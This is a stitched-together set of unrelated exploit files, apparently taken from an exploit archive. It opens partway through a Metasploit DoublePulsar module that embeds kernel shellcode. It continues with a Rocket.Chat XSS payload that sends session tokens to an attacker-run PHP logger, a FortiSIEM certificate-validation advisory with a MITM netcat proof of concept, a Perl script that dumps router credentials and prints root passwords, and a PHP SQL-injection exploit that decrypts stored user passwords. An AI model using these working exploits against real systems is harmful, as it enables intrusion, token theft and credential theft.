  OPCODES = {
    ping: 0x23,
    exec: 0xc8,
    kill: 0x77
  }

  STATUS_CODES = {
    not_detected:   0x00,
    success:        0x10,
    invalid_params: 0x20,
    alloc_failure:  0x30
  }

  def calculate_doublepulsar_status(m1, m2)
    STATUS_CODES.key(m2.to_i - m1.to_i)
  end

  # algorithm to calculate the XOR Key for DoublePulsar knocks
  def calculate_doublepulsar_xor_key(s)
    x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
    x & 0xffffffff  # this line was added just to truncate to 32 bits
  end

  # The arch is adjacent to the XOR key in the SMB signature
  def calculate_doublepulsar_arch(s)
    s == 0 ? ARCH_X86 : ARCH_X64
  end

  def generate_doublepulsar_timeout(op)
    k = SecureRandom.random_bytes(4).unpack('V').first
    0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00
  end

  def generate_doublepulsar_param(op, body)
    case OPCODES.key(op)
    when :ping, :kill
"\x00" * 12
    when :exec
      Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))
    end
  end

  def check
    ipc_share = "\\\\#{rhost}\\IPC$"

    @tree_id = do_smb_setup_tree(ipc_share)
    vprint_good("Connected to #{ipc_share} with TID = #{@tree_id}")
    vprint_status("Target OS is #{smb_peer_os}")

    vprint_status('Sending ping to DOUBLEPULSAR')
    code, signature1, signature2 = do_smb_doublepulsar_pkt
    msg = 'Host is likely INFECTED with DoublePulsar!'

    case calculate_doublepulsar_status(@multiplex_id, code)
    when :success
      @xor_key = calculate_doublepulsar_xor_key(signature1)
      @arch = calculate_doublepulsar_arch(signature2)

      arch_str =
        case @arch
        when ARCH_X86
'x86 (32-bit)'
        when ARCH_X64
'x64 (64-bit)'
        end

      vprint_good("#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}")
      CheckCode::Vulnerable
    when :not_detected
      vprint_error('DOUBLEPULSAR not detected or disabled')
      CheckCode::Safe
    else
      vprint_error('An unknown error occurred')
      CheckCode::Unknown
    end
  end

  def exploit
    if datastore['DefangedMode']
      warning = <<~EOF


        Are you SURE you want to execute code against a nation-state implant?
        You MAY contaminate forensic evidence if there is an investigation.

        Disable the DefangedMode option if you have authorization to proceed.
      EOF

      fail_with(Failure::BadConfig, warning)
    end

    # No ForceExploit because @tree_id and @xor_key are required
    unless check == CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')
    end

    case target.name
    when 'Execute payload'
      unless @xor_key
        fail_with(Failure::NotFound, 'XOR key not found')
      end

      if @arch == ARCH_X86
        fail_with(Failure::NoTarget, 'x86 is not a supported target')
      end

      print_status("Generating kernel shellcode with #{datastore['PAYLOAD']}")
      shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])
      shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)
      vprint_status("Total shellcode length: #{shellcode.length} bytes")

      print_status("Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}")
      xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)

      print_status('Sending shellcode to DOUBLEPULSAR')
      code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)
    when 'Neutralize implant'
      return neutralize_implant
    end

    case calculate_doublepulsar_status(@multiplex_id, code)
    when :success
      print_good('Payload execution successful')
    when :invalid_params
      fail_with(Failure::BadConfig, 'Invalid parameters were specified')
    when :alloc_failure
      fail_with(Failure::PayloadFailed, 'An allocation failure occurred')
    else
      fail_with(Failure::Unknown, 'An unknown error occurred')
    end
  ensure
    disconnect
  end

  def neutralize_implant
    print_status('Neutralizing DOUBLEPULSAR')
    code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])

    case calculate_doublepulsar_status(@multiplex_id, code)
    when :success
      print_good('Implant neutralization successful')
    else
      fail_with(Failure::Unknown, 'An unknown error occurred')
    end
  end

  def do_smb_setup_tree(ipc_share)
    connect

    # logon as user \
    simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])

    # connect to IPC$
    simple.connect(ipc_share)

    # return tree
    simple.shares[ipc_share]
  end

  def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)
    # make doublepulsar knock
    pkt = make_smb_trans2_doublepulsar(opcode, body)

    sock.put(pkt)
    bytes = sock.get_once

    return unless bytes

    # convert packet to response struct
    pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct
    pkt.from_s(bytes[4..-1])

    return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']
  end

  def make_smb_trans2_doublepulsar(opcode, body)
    setup_count = 1
    setup_data = [0x000e].pack('v')

    param = generate_doublepulsar_param(opcode, body)
    data = param + body.to_s

    pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct
    simple.client.smb_defaults(pkt['Payload']['SMB'])

    base_offset = pkt.to_s.length + (setup_count * 2) - 4
    param_offset = base_offset
    data_offset = param_offset + param.length

    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2
    pkt['Payload']['SMB'].v['Flags1'] = 0x18
    pkt['Payload']['SMB'].v['Flags2'] = 0xc007

    @multiplex_id = rand(0xffff)

    pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count
    pkt['Payload']['SMB'].v['TreeID'] = @tree_id
    pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id

    pkt['Payload'].v['ParamCountTotal'] = param.length
    pkt['Payload'].v['DataCountTotal'] = body.to_s.length
    pkt['Payload'].v['ParamCountMax'] = 1
    pkt['Payload'].v['DataCountMax'] = 0
    pkt['Payload'].v['ParamCount'] = param.length
    pkt['Payload'].v['ParamOffset'] = param_offset
    pkt['Payload'].v['DataCount'] = body.to_s.length
    pkt['Payload'].v['DataOffset'] = data_offset
    pkt['Payload'].v['SetupCount'] = setup_count
    pkt['Payload'].v['SetupData'] = setup_data
    pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)
    pkt['Payload'].v['Payload'] = data

    pkt.to_s
  end

  # ring3 = user mode encoded payload
  # proc_name = process to inject APC into
  def make_kernel_user_payload(ring3, proc_name)
    sc = make_kernel_shellcode(proc_name)

    sc << [ring3.length].pack("S<")
    sc << ring3

    sc
  end

  def generate_process_hash(process)
    # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
    proc_hash = 0
    process << "\x00"

    process.each_byte do |c|
      proc_hash  = ror(proc_hash, 13)
      proc_hash += c
    end

    [proc_hash].pack('l<')
  end

  def ror(dword, bits)
    (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF
  end

  def make_kernel_shellcode(proc_name)
    # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
    # Length: 780 bytes
"\x31\xc9\x41\xe2\x01\xc3\x56\x41\x57\x41\x56\x41\x55\x41\x54\x53" +
"\x55\x48\x89\xe5\x66\x83\xe4\xf0\x48\x83\xec\x20\x4c\x8d\x35\xe3" +
"\xff\xff\xff\x65\x4c\x8b\x3c\x25\x38\x00\x00\x00\x4d\x8b\x7f\x04" +
"\x49\xc1\xef\x0c\x49\xc1\xe7\x0c\x49\x81\xef\x00\x10\x00\x00\x49" +
"\x8b\x37\x66\x81\xfe\x4d\x5a\x75\xef\x41\xbb\x5c\x72\x11\x62\xe8" +
"\x18\x02\x00\x00\x48\x89\xc6\x48\x81\xc6\x08\x03\x00\x00\x41\xbb" +
"\x7a\xba\xa3\x30\xe8\x03\x02\x00\x00\x48\x89\xf1\x48\x39\xf0\x77" +
"\x11\x48\x8d\x90\x00\x05\x00\x00\x48\x39\xf2\x72\x05\x48\x29\xc6" +
"\xeb\x08\x48\x8b\x36\x48\x39\xce\x75\xe2\x49\x89\xf4\x31\xdb\x89" +
"\xd9\x83\xc1\x04\x81\xf9\x00\x00\x01\x00\x0f\x8d\x66\x01\x00\x00" +
"\x4c\x89\xf2\x89\xcb\x41\xbb\x66\x55\xa2\x4b\xe8\xbc\x01\x00\x00" +
"\x85\xc0\x75\xdb\x49\x8b\x0e\x41\xbb\xa3\x6f\x72\x2d\xe8\xaa\x01" +
"\x00\x00\x48\x89\xc6\xe8\x50\x01\x00\x00\x41\x81\xf9" +
    generate_process_hash(proc_name.upcase) +
"\x75\xbc\x49\x8b\x1e\x4d\x8d\x6e\x10\x4c\x89\xea\x48\x89\xd9" +
"\x41\xbb\xe5\x24\x11\xdc\xe8\x81\x01\x00\x00\x6a\x40\x68\x00\x10" +
"\x00\x00\x4d\x8d\x4e\x08\x49\xc7\x01\x00\x10\x00\x00\x4d\x31\xc0" +
"\x4c\x89\xf2\x31\xc9\x48\x89\x0a\x48\xf7\xd1\x41\xbb\x4b\xca\x0a" +
"\xee\x48\x83\xec\x20\xe8\x52\x01\x00\x00\x85\xc0\x0f\x85\xc8\x00" +
"\x00\x00\x49\x8b\x3e\x48\x8d\x35\xe9\x00\x00\x00\x31\xc9\x66\x03" +
"\x0d\xd7\x01\x00\x00\x66\x81\xc1\xf9\x00\xf3\xa4\x48\x89\xde\x48" +
"\x81\xc6\x08\x03\x00\x00\x48\x89\xf1\x48\x8b\x11\x4c\x29\xe2\x51" +
"\x52\x48\x89\xd1\x48\x83\xec\x20\x41\xbb\x26\x40\x36\x9d\xe8\x09" +
"\x01\x00\x00\x48\x83\xc4\x20\x5a\x59\x48\x85\xc0\x74\x18\x48\x8b" +
"\x80\xc8\x02\x00\x00\x48\x85\xc0\x74\x0c\x48\x83\xc2\x4c\x8b\x02" +
"\x0f\xba\xe0\x05\x72\x05\x48\x8b\x09\xeb\xbe\x48\x83\xea\x4c\x49" +
"\x89\xd4\x31\xd2\x80\xc2\x90\x31\xc9\x41\xbb\x26\xac\x50\x91\xe8" +
"\xc8\x00\x00\x00\x48\x89\xc1\x4c\x8d\x89\x80\x00\x00\x00\x41\xc6" +
"\x01\xc3\x4c\x89\xe2\x49\x89\xc4\x4d\x31\xc0\x41\x50\x6a\x01\x49" +
"\x8b\x06\x50\x41\x50\x48\x83\xec\x20\x41\xbb\xac\xce\x55\x4b\xe8" +
"\x98\x00\x00\x00\x31\xd2\x52\x52\x41\x58\x41\x59\x4c\x89\xe1\x41" +
"\xbb\x18\x38\x09\x9e\xe8\x82\x00\x00\x00\x4c\x89\xe9\x41\xbb\x22" +
"\xb7\xb3\x7d\xe8\x74\x00\x00\x00\x48\x89\xd9\x41\xbb\x0d\xe2\x4d" +
"\x85\xe8\x66\x00\x00\x00\x48\x89\xec\x5d\x5b\x41\x5c\x41\x5d\x41" +
"\x5e\x41\x5f\x5e\xc3\xe9\xb5\x00\x00\x00\x4d\x31\xc9\x31\xc0\xac" +
"\x41\xc1\xc9\x0d\x3c\x61\x7c\x02\x2c\x20\x41\x01\xc1\x38\xe0\x75" +
"\xec\xc3\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" +
"\x20\x48\x8b\x12\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x45\x31\xc9" +
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1" +
"\xe2\xee\x45\x39\xd9\x75\xda\x4c\x8b\x7a\x20\xc3\x4c\x89\xf8\x41" +
"\x51\x41\x50\x52\x51\x56\x48\x89\xc2\x8b\x42\x3c\x48\x01\xd0\x8b" +
"\x80\x88\x00\x00\x00\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20" +
"\x49\x01\xd0\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\xe8\x78\xff" +
"\xff\xff\x45\x39\xd9\x75\xec\x58\x44\x8b\x40\x24\x49\x01\xd0\x66" +
"\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48" +
"\x01\xd0\x5e\x59\x5a\x41\x58\x41\x59\x41\x5b\x41\x53\xff\xe0\x56" +
"\x41\x57\x55\x48\x89\xe5\x48\x83\xec\x20\x41\xbb\xda\x16\xaf\x92" +
"\xe8\x4d\xff\xff\xff\x31\xc9\x51\x51\x51\x51\x41\x59\x4c\x8d\x05" +
"\x1a\x00\x00\x00\x5a\x48\x83\xec\x20\x41\xbb\x46\x45\x1b\x22\xe8" +
"\x68\xff\xff\xff\x48\x89\xec\x5d\x41\x5f\x5e\xc3"
  end

  def kernel_shellcode_size
    make_kernel_shellcode('').length
  end

end

#[+] Title:  Rocket.Chat - Cross Site Scripting Exploit (Token Hijack)
#[+] Product: Rocket.Chat
#[+] Vendor: https://rocket.chat/
#[+] Vulnerable Version(s): Rocket.Chat < 2.1.0
#
#
# Author      :   3H34N
# Ehsan Nezami
# Website     :   nezami.me
# Twitter     :   https://twitter.com/mr_ehsane
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)


1. Create l33t.php on a web server 


<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

2. Open a chat session
3. Send payload with your web server url


![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

4. Token will be written in logs.txt when target seen your message.

Product Name: FortiSIEM
Tested versions: 5.0, 5.2.1
Fixed in version: Only a manual workaround is available from Fortinet as of
this writing
Weakness Type:  CWE-295 - Improper Certificate Validation
Discovered by: Andrew Klaus (Cybera Canada)
CVE: Pending


== Disclosure Timeline:
June 25, 2019: Initial Disclosure to Fortinet PSIRT (Received automated
ticket response)
July 15, 2019: Received response that the issue was forwarded to R&D Team
July 23, 2019: Fortinet contacted me to test a configuration change
July 24, 2019: Provided results of configuration change to Fortinet
Sept 23, 2019: Reminded Fortinet of public disclosure date
Oct 1, 2019: Public Disclosure


== Summary:
A FortiSIEM collector connects to a Supervisor/Worker over HTTPS TLS
(443/TCP) to register itself as well as relaying event data such as syslog,
netflow, SNMP, etc.

When the Collector (the client) connects to the Supervisor/Worker (the
server), the client does not validate the server-provided certificate
against its root-CA store. Since the client does no server certificate
validation, this means any certificate presented to the client will be
considered valid and the connection will succeed.

If an attacker spoofs a Worker/Supervisor using an ARP or DNS poisoning
attack (or any other MITM attack), the Collector will blindly connect to
the attacker's HTTPS TLS server. It will disclose the authentication
password used along with any data being relayed.


== Workaround:
Fortinet has created a document for customers to follow to enable
inter-node TLS validation.

At this time, Fortinet won't set this flag by default since it will impact
their existing customers. All new and existing customers will need to
follow the workaround guide that Fortinet is providing in order to mitigate.


== Proof of Concept  (PoC):

This PoC assumes a working Collector + Supervisor/Worker setup. This could
just as easily work on a Collector that is first being registered.

Note: This utilizes OpenBSD's netcat, which supports TLS. "nc" on other
operating systems may not support TLS.

(On attacker system)
First generate a new self-signed certificate:
$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -nodes
-days 365

Enter any dummy certificate details information.

Netcat listen on a TLS socket:

# nc -ckv6l -K key.pem -C cert.pem  %IP% 443
Listening on %IP% 443

After successfully poisoning the ARP cache to redirect the Collector to a
rogue server. The Collector will now connect to the attacker's TLS socket
and start sending data.

Connection received on %COLLECTOR-IP% 35244
GET
/phoenix/rest/sync/task?custId=%ID%&agentId=%ID%&time=1561402888&phProcessName=phMonitorAgent
HTTP/1.1
Authorization: Basic %AUTH-DATA%
Host: %SUPERVISOR-HOSTNAME%
Accept: */*
Cookie: JSESSIONID=%COOKIE-VALUE%


== Other Observations:

I observed this in the phoenix.log file on the FortiSIEM appliance:
[PH_GENERIC_DEBUG]:[eventSeverity]=PHL_DEBUG,[procName]=<unknown>,[fileName]=phHttpClient.cpp,[lineNumber]=1862,[phLogDetail]=set
CURLOPT_SSL_VERIFYPEER to no

This "VERIFYPEER" option determines whether curl verifies the authenticity
of the peer's certificate. A value of 1 means curl verifies the SSL/TLS
server certificate; 0 (zero) means it does not:
https://curl.haxx.se/libcurl/c/CURLOPT_SSL_VERIFYPEER.html.

The following provisioning scripts also have hardcoded curl commands with
the `-k / --insecure` flag set, which makes them susceptible to MITM'ing
connections when provisioning:

phProvisionCollector
phProvisionWorker
elastic_deploy.sh
elastic_deploy_url.sh

#!/usr/bin/perl -w
#
#  LG-ERICSSON LN202-003H HomeHub Router Remote Configuration Disclosure
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!  
#  
#  (Dont do anything without permissions)
#
#  #  [test@localhost homehubrouter]$ perl lg_ericsson.pl http://192.168.1.1:13337 | egrep --color 'ROOT_ID|ROOT_PW|ADMIN_ID|ADMIN_PW|USER_ID|USER_PW'
#  #  [ LG-ERICSSON LN202-003H HomeHub Router Remote Configuration Disclosure
#  #  [ ======================================================================
#  #  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
#  #  [ Initializing the browser
#  #  [ >>  Referer => http://192.168.1.1:13337
#  #  [ >>  User-Agent => Mozilla/5.0 (X11; U; GNU/kFreeBSD i686; en-US; rv:1.8.1.16) Gecko/20080702 Iceape/1.1.11 (Debian-1.1.11-1)
#  #  [ >>  Content-Type => application/x-www-form-urlencoded
#  #  [ <<  Connection => close
#  #  [ <<  Accept-Ranges => bytes
#  #  [ <<  Content-Length => 14890
#  #  [ <<  Content-Type => application/octet-stream
#  #  [ <<  Client-Date => Tue, 01 Oct 2019 16:52:41 GMT
#  #  [ <<  Client-Peer => 192.168.1.1:13337
#  #  [ <<  Client-Response-Num => 1
#  #  [ <<  Content-Disposition => attachment;filename="config.tgz"
#  #  [ <<  Content-Transfer-Encoding => binary
#  #  [ <<  Set-Cookie => QSESSIONID=de20d38aae21395cee9b5294429831b8; path=/
#  #  [
#  #  [ >> Decompressing the configuration dump...
#  #  [
#  #  [ USER_ID=
#  #  [ ./config/sys_password.conf0000644000000000000000000000010007033241613014553 0ustar  rootrootROOT_ID=ktroot
#  #  [ ROOT_PW=1234567890
#  #  [ USER_ID=ktuser
#  #  [ USER_PW=megaap
#  #  [ ./config/sys_user_id.conf0000644000000000000000000000003707033241613014354 0ustar  rootrootADMIN_ID=ktroot
#  #  [ USER_ID=ktuser
#  #  [ RA_USER_ID=
#  #  [ RA_USER_PW=
#  #  [test@localhost homehubrouter]$

# 
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster;
my $host = shift || 'https://192.168.1.1/'; # Full path url to the store
print  "\033[2J";    #clear the screen
print  "\033[0;0H"; #jump to 0,0
print STDERR "[ LG-ERICSSON LN202-003H HomeHub Router Remote Configuration Disclosure\n";
print STDERR "[ ======================================================================\n";
print STDERR "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
print STDERR "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
print STDERR "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
   $browser->timeout(30);
   $browser->agent($user_agent);
my $target = $host."\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x73\x79\x73\x74\x65\x6d\x5f\x63\x6f\x6e\x66\x69\x67\x5f\x66\x69\x6c\x65";
my $payload = "\x63\x6f\x6e\x66\x69\x67\x5f\x63\x6d\x64\x3d\x25\x43\x30\x25\x46\x41\x25\x43\x30\x25\x45\x35";
my $request = HTTP::Request->new (POST => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host], $payload);                      
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print STDERR "[ >>  $_ => ", $request->header($_), "\n" for  $request->header_field_names;
print STDERR "[ <<  $_ => ", $response->header($_), "\n" for  $response->header_field_names;
my $gzip = $response->content();
print STDERR "[\n[ >> Decompressing the configuration dump...\n[\n";
print  "[ ", $_, "\n" for split(/\n/,gunzip($gzip));

#!/usr/bin/php

/*
# Exploit Title: Detrix EDMS cleartext user password remote SQLI exploit

# Google Dork:
# Date: Jul 2019
# Exploit Author: Burov Konstantin
# Vendor Homepage: forum.detrix.kz
# Software Link:
https://www.documentov.com/index.php?route=document/search&search=1.2.3.1505.zip&page=1&limit=20&document_uid=3d7bae5a-c2e5-11e8-9ed8-b7ed7eb0f5bb
# Version: any
# Tested on: Detrix 1.2.3.1505
*/

<?php

/*---------------------------CHANGE-ME--------------------------------*/

$URL = "http://192.168.56.6"; // Set URL for the target host
$user_id = 0; // 0 - Default admin ID

/*--------------------------------------------------------------------*/

$banner = "Exploiting SQLi vuln and password decrypting for Detrix\n".
"http://forum.detrix.kz\nhttps://github.com/sadshade/Detrix-Passwords-PoC \n".
"sad.2.shade@mail.com, 2019.\n\n";

// SQLi request
$sql_req =
"login' AND 99=CAST('a__'||(SELECT COALESCE(CAST(password AS ".
"CHARACTER(10000)),(CHR(32))) FROM manuscript.ref_system_users OR".
"DER BY id OFFSET " . $user_id . " LIMIT 1)::text||'__a'".
"AS NUMERIC) AND 'a'='a";

$data = array('password' => 'pass',
'login' => $sql_req);

$options = array(
'http' => array(
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($data)
    )
);

// Key from %detrix%/system/utils/MSF_string.php
$sSuperDuperSecretKey =
"!-eeflslskdjfla;456864~}{fjkdlswkfkll@#$%#$9f0sf8a723#@";

echo $banner;

try {
$context  = stream_context_create($options);
echo "Send SQLi to $URL...\n";
$result = file_get_contents($URL, false, $context);
} catch (Exception $e) {
    echo 'Error: ',  $e->getMessage(), "\n";
}

if ($result != "") {
if (preg_match("/\"a__(.+)__a\"/", $result, $encrypted_pass) == 1) {

$clear_pass = trim(
openssl_decrypt(base64_decode($encrypted_pass[1]),
"BF-ECB", $sSuperDuperSecretKey,
OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING)
); // Decrypt pass
echo "Pass for User id $user_id: $clear_pass \n";
} else echo "Error: no such User id:$user_id or empty password!\n";
} else echo "Error: empty Response or error!\n"

?>